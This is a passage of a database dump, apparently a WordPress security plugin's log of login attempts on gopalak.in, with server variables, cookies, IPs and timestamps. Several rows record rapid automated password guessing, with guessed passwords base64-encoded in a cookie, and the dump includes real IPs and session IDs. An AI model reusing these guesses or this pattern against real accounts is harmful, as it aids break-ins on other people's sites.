06:48:05'),(94021,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:205:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztBRE1JTjIwMDI%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:38:\"https://www.wellbuilt.com/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745457484.1962819;s:12:\"REQUEST_TIME\";i:1745457484;}}','146.190.97.112',1,'2025-04-24 06:48:05','2025-04-25 06:48:13'),(94022,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:207:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztQYTU1d29yZA%3D%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:38:\"https://www.wellbuilt.com/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745457485.9698379;s:12:\"REQUEST_TIME\";i:1745457485;}}','146.190.97.112',1,'2025-04-24 06:48:07','2025-04-25 06:48:13'),(94023,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:213:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztHb3BhbGFrQEdvcGFsYWs%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:38:\"https://www.wellbuilt.com/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745457487.7658219;s:12:\"REQUEST_TIME\";i:1745457487;}}','146.190.97.112',1,'2025-04-24 06:48:09','2025-04-25 06:48:13'),(94024,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:213:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhazthZG1pbiMxMjM0NTY3ODk%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:38:\"https://www.wellbuilt.com/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745457489.6027989;s:12:\"REQUEST_TIME\";i:1745457489;}}','146.190.97.112',1,'2025-04-24 06:48:11','2025-04-25 06:48:13'),(94025,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:201:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztAQURNSU4%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:38:\"https://www.wellbuilt.com/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745457491.4187479;s:12:\"REQUEST_TIME\";i:1745457491;}}','146.190.97.112',1,'2025-04-24 06:48:13','2025-04-25 06:48:13'),(94026,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59278\";s:11:\"REMOTE_ADDR\";s:15:\"102.130.112.254\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745463828.4829381;s:12:\"REQUEST_TIME\";i:1745463828;}}','102.130.112.254',0,'2025-04-24 08:33:50','1970-01-01 00:00:00'),(94027,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39388\";s:11:\"REMOTE_ADDR\";s:11:\"78.135.87.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745464158.781142;s:12:\"REQUEST_TIME\";i:1745464158;}}','78.135.87.2',0,'2025-04-24 08:39:20','1970-01-01 00:00:00'),(94028,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47502\";s:11:\"REMOTE_ADDR\";s:12:\"66.85.157.26\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745464487.501219;s:12:\"REQUEST_TIME\";i:1745464487;}}','66.85.157.26',0,'2025-04-24 08:44:49','1970-01-01 00:00:00'),(94029,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42324\";s:11:\"REMOTE_ADDR\";s:15:\"134.122.118.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745464814.8739719;s:12:\"REQUEST_TIME\";i:1745464814;}}','134.122.118.246',0,'2025-04-24 08:50:16','1970-01-01 